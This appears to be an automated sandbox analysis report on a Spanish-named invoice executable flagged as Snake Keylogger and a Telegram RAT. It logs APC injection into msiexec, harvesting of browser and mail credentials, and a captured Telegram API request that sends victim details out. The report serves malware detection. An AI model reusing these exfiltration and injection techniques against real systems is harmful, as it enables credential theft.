Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -598579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -598454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -598329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -598204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -598079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -597954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -597829s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -597704s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -597579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -597454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -597329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -597204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -597079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -596954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -596829s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -596704s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -596579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -596454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -596329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -596204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -596079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -595954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -595829s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -595704s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -595579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -595454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -595329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -595204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -595079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -594954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -594829s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -594704s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -594579s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -594454s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -594329s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -594204s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -594079s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 8020	Thread sleep time: -593954s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_00406033 FindFirstFileA,FindClose,	0_2_00406033
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_004055D1
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599885	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599531	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594954	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594829	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594704	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594579	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594454	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594329	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594204	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594079	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 593954	Jump to behavior

Source: msiexec.exe, 00000004.00000002.2920754309.00000000053F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(HW
Source: msiexec.exe, 00000004.00000002.2920754309.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	API call chain: ExitProcess graph end node			graph_0-3395
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	API call chain: ExitProcess graph end node			graph_0-3243

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

Code function: 0_2_00405D51 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D51

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match	File source: 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7864, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	31 Virtualization/Sandbox Evasion	LSA Secrets	31 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
FACTURA DE PAGO.exe	8%	ReversingLabs	Win32.Malware.Nemesis
FACTURA DE PAGO.exe	21%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe	8%	ReversingLabs	Win32.Malware.Nemesis

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_Error	0%	URL Reputation	safe
http://crl.micro	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	216.58.206.46	true	false	unknown
drive.usercontent.google.com	142.250.186.33	true	false	unknown
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	193.122.6.168	true	false	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:09:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://reallyfreegeoip.org/xml/155.94.241.186	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	msiexec.exe, 00000004.00000002.2931722428.00000000210F4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot	msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20a	msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/lB	msiexec.exe, 00000004.00000002.2931722428.00000000210EF000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000004.00000002.2920754309.000000000540A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2034849572.000000000540A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org	msiexec.exe, 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/K	msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
